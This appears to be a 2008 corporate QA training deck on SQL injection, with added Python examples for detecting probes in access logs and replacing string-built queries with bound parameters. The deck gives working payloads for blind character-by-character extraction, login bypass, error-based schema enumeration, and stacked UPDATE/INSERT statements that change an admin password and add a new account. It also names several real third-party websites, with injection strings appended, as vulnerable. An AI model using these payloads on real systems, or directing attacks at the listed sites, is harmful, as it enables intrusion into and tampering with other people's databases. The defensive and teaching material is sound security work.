
SQL Injections

Core QA Team 5th March 2008

Agenda
- What is SQL Injection
- SQL Injection possibilities
- Technologies affected by SQL Injections
- Types of SQL Injections
- Techniques in SQL Injections
- How to use Blind SQL Injections
- How to use SQL Injections
- How to use Advanced SQL Injections
- How to update data in the Database
- How to avoid SQL Injections
- Next generation of Hacking
- Tools for SQL Injections
Copyright Kenexa 2004

What is SQL Injection


SQL Injection is one of the many web attack mechanisms used by hackers to steal data from organizations. It is perhaps one of the most common application-layer attack techniques used today. It is a type of attack that takes advantage of improper coding of your web applications: a hacker injects SQL commands into, say, a login form and thereby gains access to the data held within your database. In essence, SQL Injection arises because the fields available for user input allow SQL statements to pass through and query the database directly.


SQL Injection possibilities

Using SQL injections, attackers can:
- Add new data to the database
  - Could be embarrassing to find yourself selling politically incorrect items on an eCommerce site
  - Perform an INSERT in the injected SQL
- Modify data currently in the database
  - Could be very costly to have an expensive item suddenly be deeply discounted
  - Perform an UPDATE in the injected SQL
- Often gain access to other users' system capabilities by obtaining their password


Technologies affected by SQL Injections


- JSP
- ASP
- XML, XSL
- Javascript
- VB, MFC and other ODBC-based tools
- APIs
- 3- and 4GL-based languages such as C, OCI, Pro*C, and COBOL
- Perl CGI scripts that access Oracle databases
- many more


Types of SQL Injections

- Blind SQL injections
- SQL injections
- Advanced SQL injections


Techniques in SQL Injections

- Authorization bypass
- Using the SELECT command
- Using the INSERT command
- Using SQL Server stored procedures


How to use Blind SQL injection


Step 1 - For instance, many companies allow Internet access to archives of their press releases. A URL for accessing the company's fifth press release might look like this:
http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5

Step 2 - For example, if you request this URL
http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5 AND 1=1
and this query also returns the same press release, then the application is susceptible to SQL injection.

Step 3 - We can use this behavior to ask the database server true/false questions. For instance, the following request essentially asks the database server, "Is the current user john?"
http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5 AND USER_NAME() = 'john'

How to use Blind SQL injection


USER_NAME() is a SQL Server function that returns the name of the current user. If the current user is dbo (administrator), the fifth press release will be returned. If not, the query will fail and no press release will be displayed.

Step 4 - By combining subqueries and functions, we can ask more complex questions. The following example attempts to retrieve the name of a database table, one character at a time.
http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 109

Step 5 - If the server returns the fifth press release in response to this URL, we know that the first letter of the query's result comes after the letter "m" (ASCII character 109) in the alphabet. By making multiple requests, we can determine the precise ASCII value.


How to use Blind SQL injection


http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116

Step 6 - If no press release is returned, the ASCII value is greater than 109 but not greater than 116. So, the letter is between "n" (110) and "t" (116).
http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 113
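The probing described in steps 2 to 6 leaves a characteristic trail in the web server's access log: an otherwise numeric parameter is followed by AND/OR tautologies, ascii()/substring() calls and bracketed subqueries. The following is an added example (not part of the original deck) that scans Apache-style log lines for those markers. The log lines are constructed for the example and reuse the deck's pressRelease.jsp URLs; the rule set and function names are the editor's own and would need tuning for a real site.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (Apache "combined" format), not real traffic.
SAMPLE_LOG = """\
10.0.0.7 - - [05/Mar/2008:10:01:12 +0000] "GET /pressRelease.jsp?pressReleaseID=5 HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
10.0.0.7 - - [05/Mar/2008:10:01:15 +0000] "GET /pressRelease.jsp?pressReleaseID=5%20AND%201=1 HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
10.0.0.7 - - [05/Mar/2008:10:01:19 +0000] "GET /pressRelease.jsp?pressReleaseID=5%20AND%20ascii(lower(substring((SELECT%20TOP%201%20name%20FROM%20sysobjects%20WHERE%20xtype='U'),1,1)))>109 HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
10.0.0.9 - - [05/Mar/2008:10:02:03 +0000] "GET /search.jsp?q=press+release+march HTTP/1.1" 200 812 "-" "Mozilla/5.0"
10.0.0.9 - - [05/Mar/2008:10:02:40 +0000] "POST /login.asp HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Minimal parser for the combined log format: we only need client IP and request target.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule is (name, regex) applied to the percent-decoded, lower-cased query string.
RULES = [
    ("boolean tautology", re.compile(r"\b(and|or)\s+\(?(\d+|'[^']*')\s*=\s*(\d+|'[^']*'?)")),
    ("character-probe function", re.compile(r"\b(ascii|substring|char|len)\s*\(")),
    ("subquery in parameter", re.compile(r"\(\s*select\b")),
    ("comment terminator", re.compile(r"--|/\*")),
    ("stacked statement", re.compile(r";\s*(update|insert|delete|drop|exec)\b")),
]


def decode_query(target):
    """Return the query string of a request target, percent-decoded and lower-cased."""
    return unquote_plus(urlsplit(target).query).lower()


def classify_request(target):
    """Return the names of the rules a single request target triggers (empty list if none)."""
    query = decode_query(target)
    return [name for name, rx in RULES if rx.search(query)]


def find_sqli_probes(log_text):
    """Scan access-log text; return (ip, decoded query, [rule names]) for suspicious requests."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse rather than crash the scan
        reasons = classify_request(m.group("target"))
        if reasons:
            hits.append((m.group("ip"), decode_query(m.group("target")), reasons))
    return hits


if __name__ == "__main__":
    for ip, query, reasons in find_sqli_probes(SAMPLE_LOG):
        print(f"{ip}: {query!r} -> {', '.join(reasons)}")
```

Only the query string of GET requests is visible in a standard access log; the login-form payloads shown later in the deck travel in a POST body, so catching those needs application-level logging of form fields or a web application firewall in front of the server.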


URLs vulnerable to Blind SQL Injection attacks


http://www.bharatstudent.com/cafebharat/cafebharat.php?cat=2%20and%201=1
http://contentind.cricinfo.com/wivzimsa/engine/current/match/298809.html%20and%201=1
http://www.minglebox.com/user.do?method=registerUser&error=true%20and%20USERINFO_NAME="raj



How to use SQL injections

Here is a sample basic HTML form with two inputs, login and password.

<form method="post" action="http://testasp.acunetix.com/login.asp">
  <input name="tfUName" type="text" id="tfUName">
  <input name="tfUPass" type="password" id="tfUPass">
</form>

The easiest way for login.asp to work is by building a database query that looks like this:
SELECT id FROM logins WHERE username = '$username' AND password = '$password'

How to use SQL injections

If the variables $username and $password are taken directly from the user's input, this can easily be compromised. Suppose that we gave "Joe" as a username and that the following string was provided as a password:
anything' OR 'x'='x
The resulting query is:
SELECT id FROM logins WHERE username = 'Joe' AND password = 'anything' OR 'x'='x'


How to use SQL injections

As the inputs of the web application are not properly sanitised, the use of the single quotes has turned the WHERE clause into a two-component condition. The 'x'='x' part is guaranteed to be true regardless of what the first part contains. This allows the attacker to bypass the login form without actually knowing a valid username / password combination! Depending on the actual SQL query, you may have to try some of these possibilities:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a

URLs vulnerable to Blind SQL Injection attacks


http://www.osmania.ac.in/ou/res07/20080126.jsp
http://www.powerscrap.com/frame.aspx?Login=true


How to use Advanced SQL injections


The attacker could log in as the first user in the 'users' table, with the following input:
Username: ' or 1=1--

The attacker wants to establish the names of the tables that the query operates on, and the names of the fields. To do this, the attacker uses the 'having' clause of the 'select' statement:
Username: ' having 1=1--

So the attacker now knows the table name and column name of the first column in the query. They can continue through the columns by introducing each field into a 'group by' clause, as follows:
Username: ' group by users.id having 1=1--


How to use Advanced SQL injections

(which produces the error)
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/process_login.asp, line 35

Eventually the attacker arrives at the following 'username':
' group by users.id, users.username, users.password, users.privs having 1=1--
which produces no error, and is functionally equivalent to:
select * from users where username = ''

It would be useful if the attacker could determine the types of each column. This can be achieved using a 'type conversion' error message, like this:
Username: ' union select sum(username) from users--

How to update data in the Database

When we have successfully gathered all the column names of a table, it is possible to UPDATE or even INSERT a new record in the table. For example, to change the password for "neo":
http://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--

To INSERT a new record into the database:
http://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--

We can now log in as "neo2" with the password "newpas5".


How to avoid SQL Injections

Filter out characters like single quote, double quote, slash, backslash, semicolon, and extended characters like NULL, carriage return, new line, etc., in all strings from:
- Input from users
- Parameters from the URL
- Values from cookies

For numeric values, convert the value to an integer before placing it in the SQL statement, or use ISNUMERIC to make sure it is an integer.

Change "Startup and run SQL Server" to use a low-privilege user in the SQL Server Security tab.

Delete stored procedures that you are not using, like: master..xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask
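The deck's login and press-release queries both fail for the same reason: user input becomes part of the statement text. The following is an added example, written for this edit and not code from the deck, that puts the vulnerable string-built queries beside hardened versions that convert numeric input to an integer (as recommended above) and pass every value as a bound parameter, so a quote or an AND in the input can never change the statement's structure. It uses SQLite with a constructed in-memory table; the table and function names are the editor's choice, not the deck's.

```python
import sqlite3


def make_db():
    """Build an in-memory SQLite database with constructed sample rows (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE logins (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO logins VALUES (1, 'admin', 'S3cret!'), (2, 'Joe', 'joes-password');
        CREATE TABLE press_releases (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO press_releases VALUES (4, 'Q4 results'), (5, 'New office opens');
    """)
    return conn


# --- vulnerable: user input is spliced into the statement text ----------------

def login_vulnerable(conn, username, password):
    """Mirrors the deck's login.asp query; returns the matched login id, or None."""
    sql = (f"SELECT id FROM logins WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def press_release_vulnerable(conn, raw_id):
    """Numeric parameter concatenated without validation, as in pressRelease.jsp."""
    row = conn.execute(f"SELECT title FROM press_releases WHERE id = {raw_id}").fetchone()
    return row[0] if row else None


# --- hardened: values travel separately from the statement --------------------

def login_safe(conn, username, password):
    """Same query with bound parameters: a quote in the input cannot end the literal."""
    row = conn.execute(
        "SELECT id FROM logins WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def press_release_safe(conn, raw_id):
    """Convert to int first (the deck's advice for numeric values), then bind it."""
    try:
        pr_id = int(raw_id)
    except (TypeError, ValueError):
        return None  # anything that is not a plain integer is rejected outright
    row = conn.execute("SELECT title FROM press_releases WHERE id = ?", (pr_id,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    tautology = "anything' OR 'x'='x"  # the password from the deck's example
    print("vulnerable login:", login_vulnerable(db, "Joe", tautology))   # 1 (admin!)
    print("safe login:      ", login_safe(db, "Joe", tautology))         # None
    print("vulnerable id:   ", press_release_vulnerable(db, "5 AND 1=1"))  # New office opens
    print("safe id:         ", press_release_safe(db, "5 AND 1=1"))        # None
```

With the vulnerable query the tautology password matches every row, and fetchone() hands back the first one, which is the administrator; the bound-parameter version compares the whole string "anything' OR 'x'='x" against the stored password and finds nothing. Character filtering, as listed above, reduces exposure, but binding parameters removes the concatenation the attack depends on.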


Next generation of Hacking


- Ethical Hacking
- Server side scripting
- Client side scripting
- Bluetooth Hacking
- Console Hacking


Tools for SQL Injection

- SQID - Sequel Injection Digger
- SQLBrute - SQL Injection Brute Force Tool
- N-Stalker Web Application Security Scanner 2006
- Acunetix Web Vulnerability Scanner
- HP WebInspect
- Wikto: Web Server Assessment Tool




www.kenexa.com
